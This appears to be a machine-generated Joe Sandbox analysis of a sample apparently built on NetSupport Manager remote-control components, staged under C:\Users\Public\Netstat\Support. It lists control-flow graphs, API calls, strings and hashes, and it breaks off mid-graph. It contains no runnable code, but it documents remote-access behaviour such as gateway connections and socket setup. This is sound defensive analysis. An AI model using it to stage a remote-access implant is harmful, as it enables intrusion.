                                                                                      control_flow_graph 993 6c5e7030-6c5e7050 call 6c5d2a90 call 6c5edbd0 998 6c5e7097 993->998 999 6c5e7052-6c5e7095 LoadLibraryA 993->999 1000 6c5e7099-6c5e70f8 call 6c5d8d00 InitializeCriticalSection CreateEventA 998->1000 999->1000 1003 6c5e70fa-6c5e710e call 6c5d6f50 1000->1003 1004 6c5e7111-6c5e711e CreateEventA 1000->1004 1003->1004 1006 6c5e7137-6c5e7144 CreateEventA 1004->1006 1007 6c5e7120-6c5e7134 call 6c5d6f50 1004->1007 1008 6c5e715d-6c5e7170 WSAStartup 1006->1008 1009 6c5e7146-6c5e715a call 6c5d6f50 1006->1009 1007->1006 1013 6c5e7172-6c5e7182 call 6c5d5290 call 6c5d2b70 1008->1013 1014 6c5e7183-6c5e71b2 call 6c5f1b69 1008->1014 1009->1008 1022 6c5e71b4-6c5e71cd call 6c5d6f50 1014->1022 1023 6c5e71d0-6c5e71e4 call 6c5f1c50 1014->1023 1022->1023 1029 6c5e71fa-6c5e7202 1023->1029 1030 6c5e71e6-6c5e71e9 1023->1030 1032 6c5e7209-6c5e7223 call 6c5f3753 1029->1032 1033 6c5e7204 1029->1033 1030->1029 1031 6c5e71eb-6c5e71f1 1030->1031 1031->1029 1034 6c5e71f3-6c5e71f8 1031->1034 1037 6c5e723c-6c5e7255 call 6c5e9bf0 1032->1037 1038 6c5e7225-6c5e7239 call 6c5d6f50 1032->1038 1033->1032 1034->1032 1043 6c5e726a-6c5e7271 call 6c5d5730 1037->1043 1044 6c5e7257-6c5e725e 1037->1044 1038->1037 1048 6c5e730b-6c5e7310 1043->1048 1049 6c5e7277-6c5e729a call 6c5f1b69 1043->1049 1045 6c5e7260-6c5e7268 1044->1045 1045->1043 1045->1045 1050 6c5e731e-6c5e7336 call 6c5d5e90 call 6c5d5530 1048->1050 1051 6c5e7312-6c5e7315 1048->1051 1057 6c5e72be-6c5e72dc call 6c5f1c50 call 6c5f1b69 1049->1057 1058 6c5e729c-6c5e72bb call 6c5d6f50 1049->1058 1056 6c5e7339-6c5e7354 call 6c5d5e90 1050->1056 1051->1050 1054 6c5e7317-6c5e731c 1051->1054 1054->1050 1054->1056 1068 6c5e7356-6c5e735c 1056->1068 1069 6c5e7361-6c5e738b GetTickCount CreateThread 1056->1069 1074 6c5e72de-6c5e72f7 call 6c5d6f50 1057->1074 1075 6c5e72fa-6c5e7308 call 6c5f1c50 1057->1075 1058->1057 1068->1069 1071 6c5e738d-6c5e73a6 call 6c5d6f50 1069->1071 1072 6c5e73a9-6c5e73b6 SetThreadPriority 1069->1072 1071->1072 1077 6c5e73cf-6c5e73ed call 6c5d5f20 call 6c5d5e90 1072->1077 1078 6c5e73b8-6c5e73cc call 6c5d6f50 1072->1078 1074->1075 1075->1048 1090 6c5e73ef 1077->1090 1091 6c5e73f5-6c5e73f7 1077->1091 1078->1077 1090->1091 1092 6c5e73f9-6c5e7407 call 6c5edbd0 1091->1092 1093 6c5e7425-6c5e7447 GetModuleFileNameA call 6c5d2420 1091->1093 1098 6c5e741e 1092->1098 1099 6c5e7409-6c5e741c call 6c5d4580 1092->1099 1100 6c5e744c 1093->1100 1101 6c5e7449-6c5e744a 1093->1101 1103 6c5e7420 1098->1103 1099->1103 1104 6c5e7451-6c5e746d 1100->1104 1101->1104 1103->1093 1106 6c5e7470-6c5e747f 1104->1106 1106->1106 1107 6c5e7481-6c5e7486 1106->1107 1108 6c5e7487-6c5e748d 1107->1108 1108->1108 1109 6c5e748f-6c5e74c8 GetPrivateProfileIntA GetModuleHandleA 1108->1109 1110 6c5e74ce-6c5e74fa call 6c5d5e90 * 2 1109->1110 1111 6c5e7563-6c5e758f CreateMutexA timeBeginPeriod 1109->1111 1116 6c5e74fc-6c5e7511 call 6c5d5e90 1110->1116 1117 6c5e7536-6c5e755d call 6c5d5e90 * 2 1110->1117 1123 6c5e752a-6c5e7530 1116->1123 1124 6c5e7513-6c5e7528 call 6c5d5e90 1116->1124 1117->1111 1123->1117 1124->1117 1124->1123
                                                                                      APIs
                                                                                        • Part of subcall function 6C5D2A90: GetModuleFileNameA.KERNEL32(00000000,?,00000100), ref: 6C5D2ACB
                                                                                        • Part of subcall function 6C5D2A90: _strrchr.LIBCMT ref: 6C5D2ADA
                                                                                        • Part of subcall function 6C5D2A90: _strrchr.LIBCMT ref: 6C5D2AEA
                                                                                        • Part of subcall function 6C5D2A90: wsprintfA.USER32 ref: 6C5D2B05
                                                                                        • Part of subcall function 6C5EDBD0: _malloc.LIBCMT ref: 6C5EDBE9
                                                                                        • Part of subcall function 6C5EDBD0: wsprintfA.USER32 ref: 6C5EDC04
                                                                                        • Part of subcall function 6C5EDBD0: _memset.LIBCMT ref: 6C5EDC27
                                                                                      • LoadLibraryA.KERNEL32(WinInet.dll), ref: 6C5E7057
                                                                                      • InitializeCriticalSection.KERNEL32(6C61B898), ref: 6C5E70DF
                                                                                      • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 6C5E70EF
                                                                                      • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 6C5E7115
                                                                                      • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 6C5E713B
                                                                                      • WSAStartup.WSOCK32(00000101,6C61B91A), ref: 6C5E7167
                                                                                      • _malloc.LIBCMT ref: 6C5E71A3
                                                                                        • Part of subcall function 6C5F1B69: __FF_MSGBANNER.LIBCMT ref: 6C5F1B82
                                                                                        • Part of subcall function 6C5F1B69: __NMSG_WRITE.LIBCMT ref: 6C5F1B89
                                                                                        • Part of subcall function 6C5F1B69: HeapAlloc.KERNEL32(00000000,00000001,00000001,00000000,00000000,?,6C5FD3C1,6C5F6E81,00000001,6C5F6E81,?,6C5FF447,00000018,6C617738,0000000C,6C5FF4D7), ref: 6C5F1BAE
                                                                                      • _memset.LIBCMT ref: 6C5E71D3
                                                                                      • _calloc.LIBCMT ref: 6C5E7214
                                                                                      • _malloc.LIBCMT ref: 6C5E728B
                                                                                      • _memset.LIBCMT ref: 6C5E72C1
                                                                                      • _malloc.LIBCMT ref: 6C5E72CD
                                                                                      • _memset.LIBCMT ref: 6C5E7303
                                                                                      • GetTickCount.KERNEL32 ref: 6C5E7361
                                                                                      • CreateThread.KERNEL32(00000000,00004000,6C5E6BA0,00000000,00000000,6C61BACC), ref: 6C5E737E
                                                                                      • SetThreadPriority.KERNEL32(00000000,00000001), ref: 6C5E73AC
                                                                                      • GetModuleFileNameA.KERNEL32(00000000,C:\Users\Public\Netstat\Support\,00000104), ref: 6C5E7430
                                                                                      • GetPrivateProfileIntA.KERNEL32(htctl.packet_tracing,mode,00000000,C:\Users\Public\Netstat\Support\pci.ini), ref: 6C5E74B0
                                                                                      • GetModuleHandleA.KERNEL32(nsmtrace), ref: 6C5E74C0
                                                                                      • CreateMutexA.KERNEL32(00000000,00000000,00000000), ref: 6C5E7566
                                                                                      • timeBeginPeriod.WINMM(00000001), ref: 6C5E7573
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.4163444203.000000006C5D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C5D0000, based on PE: true
                                                                                      • Associated: 00000005.00000002.4163419396.000000006C5D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163492259.000000006C610000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163517187.000000006C619000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163540005.000000006C61A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163540005.000000006C61E000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163584177.000000006C620000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_6c5d0000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: Create$_malloc_memset$EventModule$FileNameThread_strrchrwsprintf$AllocBeginCountCriticalHandleHeapInitializeLibraryLoadMutexPeriodPriorityPrivateProfileSectionStartupTick_calloctime
                                                                                      • String ID: (iflags & CTL_REMOTE) == 0$*CMPI$*DisconnectTimeout$051829$C:\Users\Public\Netstat\Support\$C:\Users\Public\Netstat\Support\pci.ini$General$HTCTL32$NSM165348$NetworkSpeed$Support\$Trace$TraceFile$TraceRecv$TraceSend$WinInet.dll$_debug$e:\nsmsrc\nsm\1210\1210f\ctl32\htctl.c$htctl.packet_tracing$mode$nsmtrace$pci.ini$sv.ResumeEvent$sv.gateways$sv.hRecvThread$sv.hRecvThreadReadyEvent$sv.hResponseEvent$sv.s$sv.subset.omit$sv.subset.subset
                                                                                      • API String ID: 3301999572-1741121462
                                                                                      • Opcode ID: 5d081a41dfd9bf93e5597d3cba939311992e1d2ed10c0aeecb4869c2e8a98381
                                                                                      • Instruction ID: 0dee276890cdb34187167312b63104ddfd4d8682cb2b258eb1bb316ee71beeed
                                                                                      • Opcode Fuzzy Hash: 5d081a41dfd9bf93e5597d3cba939311992e1d2ed10c0aeecb4869c2e8a98381
                                                                                      • Instruction Fuzzy Hash: 2DD1B4F0A04305AFDB10AF6E8CC695A7BF8EB4A34AF55492AE405D7F41D630AC448F9D
                                                                                      Function 11061C90 Relevance: 76.5, APIs: 22, Strings: 21, Instructions: 1221COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 11144EA0: GetLastError.KERNEL32(?,0286B8D0,000000FF,?), ref: 11144ED5
                                                                                        • Part of subcall function 11144EA0: Sleep.KERNEL32(000000C8,?,?,?,?,?,?,0286B8D0,000000FF,?), ref: 11144EE5
                                                                                      • _fgets.LIBCMT ref: 11061DC2
                                                                                      • _strpbrk.LIBCMT ref: 11061E29
                                                                                      • _fgets.LIBCMT ref: 11061F2C
                                                                                      • _strpbrk.LIBCMT ref: 11061FA3
                                                                                      • __wcstoui64.LIBCMT ref: 11061FBC
                                                                                      • _fgets.LIBCMT ref: 11062035
                                                                                      • _strpbrk.LIBCMT ref: 1106205B
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.4162903482.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000005.00000002.4162887009.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163046759.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163086848.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163110629.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: _fgets_strpbrk$ErrorLastSleep__wcstoui64
                                                                                      • String ID: %c%04d%s$%s.%04d.%s$/- $?expirY$?starT$ACM$Client$Expired$_License$_checksum$_include$_version$cd_install$defaults$enforce$expiry$inactive$licensee$product$shrink_wrap$start
                                                                                      • API String ID: 716802716-1571441106
                                                                                      • Opcode ID: 138079b93c76e623c3914dadf52ec1966105b04443ff76c6d6b694830cc74feb
                                                                                      • Instruction ID: 9b454a0e08db4b844aa329f9a873b431930d9d904307df7fc69ae15b9a8492e5
                                                                                      • Opcode Fuzzy Hash: 138079b93c76e623c3914dadf52ec1966105b04443ff76c6d6b694830cc74feb
                                                                                      • Instruction Fuzzy Hash: 55A2D375E0461A9FEB21CF64CC80BEFB7B9AF44345F0041D9E849A7281EB71AA45CF61
                                                                                      Function 11143570 Relevance: 66.6, APIs: 20, Strings: 18, Instructions: 134libraryloaderCOMMONLIBRARYCODE
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 1921 11143570-111435b1 GetModuleFileNameA 1922 111435f3 1921->1922 1923 111435b3-111435c6 call 11081b40 1921->1923 1925 111435f9-111435fd 1922->1925 1923->1922 1929 111435c8-111435f1 LoadLibraryA 1923->1929 1927 111435ff-1114360c LoadLibraryA 1925->1927 1928 11143619-11143637 GetModuleHandleA GetProcAddress 1925->1928 1927->1928 1930 1114360e-11143616 LoadLibraryA 1927->1930 1931 11143647-11143670 GetProcAddress * 4 1928->1931 1932 11143639-11143645 1928->1932 1929->1925 1930->1928 1933 11143673-111436eb GetProcAddress * 10 call 11161d01 1931->1933 1932->1933 1935 111436f0-111436f3 1933->1935
                                                                                      APIs
                                                                                      • GetModuleFileNameA.KERNEL32(00000000,?,00000104,00000000,8504C483,74DF23A0), ref: 111435A3
                                                                                      • LoadLibraryA.KERNEL32(?), ref: 111435EC
                                                                                      • LoadLibraryA.KERNEL32(DBGHELP.DLL), ref: 11143605
                                                                                      • LoadLibraryA.KERNEL32(IMAGEHLP.DLL), ref: 11143614
                                                                                      • GetModuleHandleA.KERNEL32(?), ref: 1114361A
                                                                                      • GetProcAddress.KERNEL32(00000000,SymGetLineFromAddr), ref: 1114362E
                                                                                      • GetProcAddress.KERNEL32(00000000,SymGetLineFromName), ref: 1114364D
                                                                                      • GetProcAddress.KERNEL32(00000000,SymGetLineNext), ref: 11143658
                                                                                      • GetProcAddress.KERNEL32(00000000,SymGetLinePrev), ref: 11143663
                                                                                      • GetProcAddress.KERNEL32(00000000,SymMatchFileName), ref: 1114366E
                                                                                      • GetProcAddress.KERNEL32(00000000,StackWalk), ref: 11143679
                                                                                      • GetProcAddress.KERNEL32(00000000,SymCleanup), ref: 11143684
                                                                                      • GetProcAddress.KERNEL32(00000000,SymLoadModule), ref: 1114368F
                                                                                      • GetProcAddress.KERNEL32(00000000,SymInitialize), ref: 1114369A
                                                                                      • GetProcAddress.KERNEL32(00000000,SymGetOptions), ref: 111436A5
                                                                                      • GetProcAddress.KERNEL32(00000000,SymSetOptions), ref: 111436B0
                                                                                      • GetProcAddress.KERNEL32(00000000,SymGetModuleInfo), ref: 111436BB
                                                                                      • GetProcAddress.KERNEL32(00000000,SymGetSymFromAddr), ref: 111436C6
                                                                                      • GetProcAddress.KERNEL32(00000000,SymFunctionTableAccess), ref: 111436D1
                                                                                      • GetProcAddress.KERNEL32(00000000,MiniDumpWriteDump), ref: 111436DC
                                                                                        • Part of subcall function 11081B40: _strrchr.LIBCMT ref: 11081B4E
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.4162903482.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000005.00000002.4162887009.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163046759.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163086848.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163110629.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: AddressProc$LibraryLoad$Module$FileHandleName_strrchr
                                                                                      • String ID: DBGHELP.DLL$IMAGEHLP.DLL$MiniDumpWriteDump$StackWalk$SymCleanup$SymFunctionTableAccess$SymGetLineFromAddr$SymGetLineFromName$SymGetLineNext$SymGetLinePrev$SymGetModuleInfo$SymGetOptions$SymGetSymFromAddr$SymInitialize$SymLoadModule$SymMatchFileName$SymSetOptions$dbghelp.dll
                                                                                      • API String ID: 3874234733-2061581830
                                                                                      • Opcode ID: cfe4e0547bd5fe59c7f15dfeaa5816d95d94d48cef7707ac470bf4deacf2edb6
                                                                                      • Instruction ID: 707b91cc949213dae1a505c6abf15ec2f20ed18dfa7402eb99b54f6ccfa65761
                                                                                      • Opcode Fuzzy Hash: cfe4e0547bd5fe59c7f15dfeaa5816d95d94d48cef7707ac470bf4deacf2edb6
                                                                                      • Instruction Fuzzy Hash: 05411B70A04714AFD7309F768D84A6BFAF8BF55A04B10492EE496D3A10EBB5E8008F5D
                                                                                      Function 6C5DA980 Relevance: 56.4, APIs: 28, Strings: 4, Instructions: 389networkCOMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 1936 6c5da980-6c5da9e7 call 6c5d5840 1939 6c5da9ed-6c5da9f0 1936->1939 1940 6c5daa9c 1936->1940 1939->1940 1942 6c5da9f6-6c5da9fb 1939->1942 1941 6c5daaa2-6c5daaae 1940->1941 1943 6c5daac6-6c5daacd 1941->1943 1944 6c5daab0-6c5daac5 call 6c5f28e1 1941->1944 1942->1940 1945 6c5daa01-6c5daa06 1942->1945 1946 6c5daacf-6c5daad7 1943->1946 1947 6c5dab48-6c5dab58 socket 1943->1947 1945->1940 1949 6c5daa0c-6c5daa21 EnterCriticalSection 1945->1949 1946->1947 1952 6c5daad9-6c5daadc 1946->1952 1953 6c5dab5a-6c5dab6f WSAGetLastError call 6c5f28e1 1947->1953 1954 6c5dab70-6c5dabc9 #21 * 2 call 6c5d5e90 1947->1954 1950 6c5daa89-6c5daa9a LeaveCriticalSection 1949->1950 1951 6c5daa23-6c5daa2b 1949->1951 1950->1941 1957 6c5daa30-6c5daa39 1951->1957 1952->1947 1958 6c5daade-6c5dab05 call 6c5da5c0 1952->1958 1965 6c5dabe8-6c5dac1f bind 1954->1965 1966 6c5dabcb-6c5dabe3 #21 1954->1966 1961 6c5daa49-6c5daa51 1957->1961 1962 6c5daa3b-6c5daa3f 1957->1962 1973 6c5dab0b-6c5dab2f WSAGetLastError call 6c5d30a0 1958->1973 1974 6c5dad4a-6c5dad69 EnterCriticalSection 1958->1974 1961->1957 1969 6c5daa53-6c5daa5e LeaveCriticalSection 1961->1969 1962->1961 1967 6c5daa41-6c5daa47 1962->1967 1970 6c5dac41-6c5dac49 1965->1970 1971 6c5dac21-6c5dac40 WSAGetLastError closesocket call 6c5f28e1 1965->1971 1966->1965 1967->1961 1972 6c5daa60-6c5daa88 LeaveCriticalSection call 6c5f28e1 1967->1972 1969->1941 1978 6c5dac59-6c5dac64 1970->1978 1979 6c5dac4b-6c5dac57 1970->1979 1987 6c5dae82-6c5dae92 call 6c5f28e1 1973->1987 1990 6c5dab35-6c5dab47 call 6c5f28e1 1973->1990 1980 6c5dad6f-6c5dad7d 1974->1980 1981 6c5dae50-6c5dae80 LeaveCriticalSection GetTickCount InterlockedExchange 1974->1981 1986 6c5dac65-6c5dac83 htons WSASetBlockingHook call 6c5d7610 1978->1986 1979->1986 1982 6c5dad80-6c5dad86 1980->1982 1981->1987 1988 6c5dad88-6c5dad90 1982->1988 1989 6c5dad97-6c5dae0f InitializeCriticalSection call 6c5d8fb0 call 6c5f0ef0 1982->1989 1996 6c5dac88-6c5dac8d 1986->1996 1988->1982 1993 6c5dad92 1988->1993 2011 6c5dae18-6c5dae4b getsockname 1989->2011 2012 6c5dae11 1989->2012 1993->1981 2000 6c5dac8f-6c5dacc5 WSAGetLastError WSAUnhookBlockingHook closesocket call 6c5d30a0 call 6c5f28e1 1996->2000 2001 6c5dacc6-6c5daccd 1996->2001 2002 6c5daccf-6c5dacd6 2001->2002 2003 6c5dad45 WSAUnhookBlockingHook 2001->2003 2002->2003 2006 6c5dacd8-6c5dacfb call 6c5da5c0 2002->2006 2003->1974 2006->2003 2015 6c5dacfd-6c5dad2c WSAGetLastError WSAUnhookBlockingHook closesocket call 6c5d30a0 2006->2015 2011->1981 2012->2011 2015->1987 2018 6c5dad32-6c5dad44 call 6c5f28e1 2015->2018
                                                                                      APIs
                                                                                        • Part of subcall function 6C5D5840: inet_ntoa.WSOCK32(00000080,?,00000000,?,6C5D8F91,00000000,00000000,6C61B8DA,?,00000080), ref: 6C5D5852
                                                                                      • EnterCriticalSection.KERNEL32(6C61B898,?,00000000,00000000), ref: 6C5DAA11
                                                                                      • LeaveCriticalSection.KERNEL32(6C61B898), ref: 6C5DAA58
                                                                                      • LeaveCriticalSection.KERNEL32(6C61B898), ref: 6C5DAA68
                                                                                      • LeaveCriticalSection.KERNEL32(6C61B898), ref: 6C5DAA94
                                                                                      • WSAGetLastError.WSOCK32(?,?,?,?,?,00000000,00000000), ref: 6C5DAB0B
                                                                                      • socket.WSOCK32(00000002,00000001,00000000,?,00000000,00000000), ref: 6C5DAB4E
                                                                                      • WSAGetLastError.WSOCK32(00000002,00000001,00000000,?,00000000,00000000), ref: 6C5DAB5A
                                                                                      • #21.WSOCK32(00000000,0000FFFF,00001001,?,00000004,00000002,00000001,00000000,?,00000000,00000000), ref: 6C5DAB8E
                                                                                      • #21.WSOCK32(00000000,0000FFFF,00000080,?,00000004,00000000,0000FFFF,00001001,?,00000004,00000002,00000001,00000000,?,00000000,00000000), ref: 6C5DABB1
                                                                                      • #21.WSOCK32(00000000,00000006,00000001,?,00000004,00000002,00000001,00000000,?,00000000,00000000), ref: 6C5DABE3
                                                                                      • bind.WSOCK32(00000000,?,00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 6C5DAC18
                                                                                      • WSAGetLastError.WSOCK32(00000000,?,00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 6C5DAC21
                                                                                      • closesocket.WSOCK32(00000000,00000000,?,00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 6C5DAC29
                                                                                      • htons.WSOCK32(00000000,00000000,?,00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 6C5DAC65
                                                                                      • WSASetBlockingHook.WSOCK32(6C5D63A0,00000000,00000000,?,00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 6C5DAC76
                                                                                      • WSAGetLastError.WSOCK32(00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 6C5DAC8F
                                                                                      • WSAUnhookBlockingHook.WSOCK32(00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 6C5DAC96
                                                                                      • closesocket.WSOCK32(00000000,00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 6C5DAC9C
                                                                                      • WSAGetLastError.WSOCK32(?,?,?,?,00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 6C5DACFD
                                                                                      • WSAUnhookBlockingHook.WSOCK32(?,?,?,?,00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 6C5DAD04
                                                                                      • closesocket.WSOCK32(00000000,?,?,?,?,00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 6C5DAD0A
                                                                                      • WSAUnhookBlockingHook.WSOCK32(00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 6C5DAD45
                                                                                      • EnterCriticalSection.KERNEL32(6C61B898,00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 6C5DAD4F
                                                                                      • InitializeCriticalSection.KERNEL32(-6C61CB4A), ref: 6C5DADE6
                                                                                        • Part of subcall function 6C5D8FB0: _memset.LIBCMT ref: 6C5D8FE4
                                                                                        • Part of subcall function 6C5D8FB0: getsockname.WSOCK32(?,?,00000010,?,02852FE8,?), ref: 6C5D9005
                                                                                      • getsockname.WSOCK32(00000000,?,?), ref: 6C5DAE4B
                                                                                      • LeaveCriticalSection.KERNEL32(6C61B898), ref: 6C5DAE60
                                                                                      • GetTickCount.KERNEL32 ref: 6C5DAE6C
                                                                                      • InterlockedExchange.KERNEL32(?,00000000), ref: 6C5DAE7A
                                                                                      Strings
                                                                                      • Cannot connect to gateway %s, error %d, xrefs: 6C5DACA6
                                                                                      • Connect error to %s using hijacked socket, error %d, xrefs: 6C5DAB17
                                                                                      • *TcpNoDelay, xrefs: 6C5DABB8
                                                                                      • Cannot connect to gateway %s via web proxy, error %d, xrefs: 6C5DAD14
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.4163444203.000000006C5D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C5D0000, based on PE: true
                                                                                      • Associated: 00000005.00000002.4163419396.000000006C5D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163492259.000000006C610000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163517187.000000006C619000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163540005.000000006C61A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163540005.000000006C61E000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163584177.000000006C620000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_6c5d0000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: CriticalSection$ErrorLast$BlockingHookLeave$Unhookclosesocket$Entergetsockname$CountExchangeInitializeInterlockedTick_memsetbindhtonsinet_ntoasocket
                                                                                      • String ID: *TcpNoDelay$Cannot connect to gateway %s via web proxy, error %d$Cannot connect to gateway %s, error %d$Connect error to %s using hijacked socket, error %d
                                                                                      • API String ID: 692187944-2561115898
                                                                                      • Opcode ID: f4a079e2fe642fe042012d4e0c9d55cb29d927114e22d132283d1190d0600107
                                                                                      • Instruction ID: fb70bedb50f581ab446862bef5ac2d3b9a14edd6e83d34ccd58adfe83e01b611
                                                                                      • Opcode Fuzzy Hash: f4a079e2fe642fe042012d4e0c9d55cb29d927114e22d132283d1190d0600107
                                                                                      • Instruction Fuzzy Hash: 5EE18F71A01219DFDB14DF68CC80BDEB3B5EB88305F1141AAE91A97A80DB70AE49CF55
                                                                                      Function 11139090 Relevance: 54.7, APIs: 20, Strings: 11, Instructions: 474windowthreadCOMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 2087 11139090-111390c5 2088 111390d2-111390d9 2087->2088 2089 111390c7-111390cd GetCurrentThreadId 2087->2089 2090 111390e0-111390fc call 11133920 call 11133400 2088->2090 2091 111390db call 11029330 2088->2091 2089->2088 2097 11139102-11139108 2090->2097 2098 111391db-111391e2 2090->2098 2091->2090 2099 1113975a-11139775 call 11161d01 2097->2099 2100 1113910e-1113916f call 11138c30 IsWindow IsWindowVisible call 11146450 call 1105dd10 IsWindowVisible 2097->2100 2101 1113929a-111392b0 2098->2101 2102 111391e8-111391ef 2098->2102 2140 111391d1 2100->2140 2141 11139171-11139177 2100->2141 2110 111392b6-111392bd 2101->2110 2111 111393ef 2101->2111 2102->2101 2105 111391f5-111391fc 2102->2105 2105->2101 2108 11139202-11139211 FindWindowA 2105->2108 2108->2101 2113 11139217-1113921c IsWindowVisible 2108->2113 2115 111392bf-111392c9 2110->2115 2116 111392ce-111392ee call 1105dd10 2110->2116 2117 111393f1-11139402 2111->2117 2118 11139435-11139440 2111->2118 2113->2101 2114 1113921e-11139225 2113->2114 2114->2101 2120 11139227-1113924c call 11138c30 IsWindowVisible 2114->2120 2115->2118 2116->2118 2137 111392f4-11139323 2116->2137 2122 11139404-11139414 2117->2122 2123 1113941a-1113942f 2117->2123 2124 11139442-11139462 call 1105dd10 2118->2124 2125 11139476-1113947c 2118->2125 2120->2101 2143 1113924e-1113925d IsIconic 2120->2143 2122->2123 2123->2118 2146 11139470 2124->2146 2147 11139464-1113946e call 1102cff0 2124->2147 2127 1113947e-1113948a call 11138c30 2125->2127 2128 1113948d-11139495 2125->2128 2127->2128 2135 111394a7 2128->2135 2136 11139497-111394a2 call 1106b860 2128->2136 2145 111394a7 call 1112ce90 2135->2145 2136->2135 2156 11139325-11139339 